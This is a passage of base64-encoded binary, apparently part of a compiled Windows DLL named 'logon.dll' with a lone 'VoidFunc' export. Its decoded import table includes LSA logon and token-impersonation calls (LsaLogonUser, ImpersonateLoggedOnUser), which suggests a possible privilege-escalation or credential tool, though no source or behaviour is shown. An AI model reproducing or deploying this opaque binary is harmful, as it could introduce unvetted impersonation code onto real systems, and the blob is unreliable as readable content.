AAND///8AAAAA/v///wAAAADflwAQAAAAAP7///8AAAAAyP///wAAAAD+////AAAAADuhABAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAsrEAEAAAAAD+////AAAAAMz///8AAAAA/v///wAAAADExgAQAAAAAAAAAACOxgAQ/v///wAAAADQ////AAAAAP7///8AAAAAbskAEAAAAAD+////AAAAANj///8AAAAA/v///wAAAAD8yQAQAAAAAP7///8AAAAA2P///wAAAAD+////AAAAAHjSABAAAAAA/v///wAAAADM////AAAAAP7///8AAAAA5fMAEAAAAAD+////AAAAANT///8AAAAA/v///wAAAADh9AAQAAAAAP7///8AAAAA0P///wAAAAD+////AAAAAPH3ABAAAAAAAAAAAOPo+1IAAAAAMmIBAAEAAAABAAAAAQAAAChiAQAsYgEAMGIBAGAYAAA8YgEAAABsb2dvbi5kbGwAVm9pZEZ1bmMAAAAAsGMBAAAAAAAAAAAACGQBABgBAQCsYgEAAAAAAAAAAACCZAEAFAABAJhiAQAAAAAAAAAAAOxkAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ZAEAqGQBAJBkAQDSZAEAAAAAACJkAQAuZAEAQmQBABRkAQBiZAEAamQBAHZkAQDYaAEA6GgBAPhoAQBSZAEAsGYBAPpkAQAKZQEAGmUBACxlAQBCZQEAVGUBAGBlAQB0ZQEAkGUBAJ5lAQC0ZQEAxmUBANxlAQDyZQEA/mUBAApmAQAWZgEAJmYBADhmAQBIZgEAVmYBAG5mAQCAZgEAlmYBAAxpAQDGZgEA4GYBAPpmAQAUZwEAMGcBAE5nAQB2ZwEAimcBAJZnAQCkZwEAsmcBALxnAQDQZwEA6GcBAABoAQAWaAEAKGgBADpoAQBEaAEAUGgBAFxoAQBqaAEAemgBAIpoAQCcaAEAsGgBAMZoAQAAAAAA+GMBANZjAQDAYwEAAAAAACYATHNhQ29ubmVjdFVudHJ1c3RlZAAsAExzYUxvb2t1cEF1dGhlbnRpY2F0aW9uUGFja2FnZQAAKwBMc2FMb2dvblVzZXIAAFNlY3VyMzIuZGxsAMIAQ3JlYXRlRmlsZVcATwRSZWFkRmlsZQAACQJHZXRDdXJyZW50UHJvY2VzcwBQAkdldExhc3RFcnJvcgAA0QBDcmVhdGVNdXRleFcAAFAFU2xlZXAACQZsc3RybGVuVwAA3wVXcml0ZUZpbGUAS0VSTkVMMzIuZGxsAADTAUxzYU50U3RhdHVzVG9XaW5FcnJvcgASAk9wZW5Qcm9jZXNzVG9rZW4AAG8BR2V0VG9rZW5JbmZvcm1hdGlvbgCJAUltcGVyc29uYXRlTG9nZ2VkT25Vc2VyAEFEVkFQSTMyLmRsbAAAIQFFbmNvZGVQb2ludGVyAP4ARGVjb2RlUG9pbnRlcgDIAUdldENvbW1hbmRMaW5lQQAOAkdldEN1cnJlbnRUaHJlYWRJZAAAPwRSYWlzZUV4Y2VwdGlvbgAArARSdGxVbndpbmQAZwNJc0RlYnVnZ2VyUHJlc2VudABtA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAUQFFeGl0UHJvY2VzcwBmAkdldE1vZHVsZUhhbmRsZUV4VwAAnQJHZXRQcm9jQWRkcmVzcwAA0QNNdWx0aUJ5dGVUb1dpZGVDaGFyAMsFV2lkZUNoYXJUb011bHRpQnl0ZQA4A0hlYXBTaXplAAAzA0hlYXBGcmVlAAAvA0hlYXBBbGxvYwAKBVNldExhc3RFcnJvcgAAogJHZXRQcm9jZXNzSGVhcAAAwAJHZXRTdGRIYW5kbGUAAD4CR2V0RmlsZVR5cGUABQFEZWxldGVDcml0aWNhbFNlY3Rpb24AvgJHZXRTdGFydHVwSW5mb1cAYgJHZXRNb2R1bGVGaWxlTmFtZUEAAC0EUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIACgJHZXRDdXJyZW50UHJvY2Vzc0lkANYCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAJwJHZXRFbnZpcm9ubWVudFN0cmluZ3NXAACdAUZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAIAFVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAABBBVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgBIA0luaXRpYWxpemVDcml0aWNhbFNlY3Rpb25BbmRTcGluQ291bnQAXwVUZXJtaW5hdGVQcm9jZXNzAABxBVRsc0FsbG9jAABzBVRsc0dldFZhbHVlAHQFVGxzU2V0VmFsdWUAcgVUbHNGcmVlAGcCR2V0TW9kdWx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4PEc8ozyqPN08Bj0vPZQ9Kz8AIAAA7AAAADIwPDBXMGMw1zDjMIcxkzH7MQEyJTIrMloydTKQMqsyuDLOMhgzJjMwM1QzXjOCM4wzojPTM/szCTS1NdM17DXzNfs1ADYENgg2MTZXNnU2fDaANoQ2iDaMNpA2lDaYNuI26DbsNvA29DZaN2U3gDeHN4w3kDeUN7U33zcROBg4HDggOCQ4KDgsODA4NDh+OIQ4iDiMOJA4BToKOg86JjpvOnY6fjruOvM6/DoIOw07Njs8O1471DviO+w7FjxOPFM8XTyRPKY8sDy6PPs8ET06PVU9qz3APdo9PT5rPgM/Kz85PwAwAABAAQAA5TADMRwxIzErMTAxNDE4MWExhzGlMawxsDG0MbgxvDHAMcQxyDESMhgyHDIgMiQyijKVMrAytzK8MsAyxDLlMg8zQTNIM0wzUDNUM1gzXDNgM2QzrjO0M7gzvDPAM8c1EjY2Nis3SzecN7Q3uTcnOTg5WDpeOmI6ZzptOnE6dzp7OoE6hTqKOpA6lDqaOp46pDqoOq46sjrGOuQ6BjscO2A73zvpO/A7Azw7PEE8RzxNPFM8WTxgPGc8bjx1PHw8gzyKPJI8mjyiPK48tzy8PMI8zDzWPOY89jwGPQ89IT0vPUY9UT2APeU97j32PRA+Lz5EPk4+Zz5xPn4+iD6ePqY+rz64Pto+4z7pPu8+DT8aPyI/Pj9KP1A/Wz9pP3I/fD+MP5E/lj+nP6w/vT/CP88/1D/lPwAAAEAAAKwAAAAcMCQwNzBCMEcwVzBjMGgwczB9MJMwtDBUMWsxeDGEMZQxmjGrMcox4DHqMfAx+zEeMiMyLzI0MlMypTKrMtAy5TIBMyIzYTN2M5EzrjMINJs0ozS6NNg0GjWLNZ01tjXtNQM2CTYbNnA2gjbCNs023zZ1OJA4pji8OMQ4Fzz/PAo9Gj1MPb09zz3hPa8+0D7VPiw/Sz9iP3E/tD+6P9w/7D8AAABQAACkAAAAzjAOMRkxHzFrMnIyzTMxNDg0TjRYNJo0zjTiNBI1lDYUN0E3eTeBN8o35DcYOB44RzhiOHo4hjiVOLo4/DhNOVc5eTmUOa05vjnLOdI54DnpORw6MTo3Om86ezq7Oto6DzsqO287dTt8O9E7CTwcPG08nTy9POM88zwIPRI9GD0ePSQ9iD2NPR0/LD9jP28/sz+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EP4g/jD+QP8w/1D/cP+Q/7D/0P/w/ACABAIwDAAAEMAwwFDAcMCQwLDA0MDwwRDBMMFQwXDBkMGwwdDB8MIQwjDCUMJwwpDCsMLQwvDDEMMww1DDcMOQw7DD0MPwwBDEMMRQxHDEkMSwxNDE8MUQxTDFUMVwxZDFsMXQxfDGEMYwxlDGcMaQxrDG0MbwxxDHMMdQx3DHkMewx9DH8MQQyDDIUMhwyJDIsMjQyPDJEMkwyVDJcMmQybDJ0MnwyhDKMMpQynDKkMqwytDK8MsQyzDLUMtwy5DLsMvQy/DIEMwwzFDMcMyQzLDM0MzwzRDNMM1QzXDNkM2wzdDN8M4QzjDOUM5wzpDOsM7QzvDPEM8wz1DPcM+Qz7DP0M/wzBDQMNBQ0HDQkNCw0NDQ8NEQ0TDRUNFw0ZDRsNHQ0fDSENIw0lDScNKQ0rDS0NLw0xDTMNNQ03DTkNOw09DT8NAQ1DDUUNRw1JDUsNTQ1PDVENUw1VDVcNWQ1bDV0NXw1hDWMNZQ1nDWkNaw1tDW8NcQ1zDXUNdw15DXsNfQ1/DUENgw2FDYcNiQ2LDY0Njw2RDZMNlQ2XDZkNmw2dDZ8NoQ2jDaUNpw2pDasNrQ2vDbENsw21DbcNuQ26DbwNvg2ADcINxA3GDcgNyg3MDc4N0A3SDdQN1g3YDdoN3A3eDeAN4g3kDeYN6A3qDewN7g3wDfIN9A32DfgN+g38Df4NwA4CDgQOBg4IDgoODA4ODhAOEg4UDhYOGA4aDhwOHg4gDiIOJA4mDigOKg4sDi4OMA4yDjQONg44DjoOPA4+DgAOQg5EDkYOSA5KDkwOTg5QDlIOVA5WDlgOWg5cDl4OYA5iDmQOZg5oDmoObA5uDnAOcg50DnYOeA56DnwOfg5ADoIOhA6GDogOig6MDo4OkA6SDpQOlg6YDpoOnA6eDqAOog6kDqYOqA6qDqwOrg6wDrIOtA62DrgOug68Dr4OgA7CDsQOxg7IDsoOzA7ODtAO0g7UDtYO2A7aDtwO3g7gDuIO5A7mDugO6g7sDu4O8A7yDvQO9g74DvoO/A7+DsAPAg8EDwYPCA8KDwwPDg8QDxIPFA8WDxgPGg8cDx4PIA8iDyQPJg8oDyoPLA8uDzAPMg80DzYPOA86DzwPPg8AD0IPRA9GD0gPSg9MD04PUA9SD1Q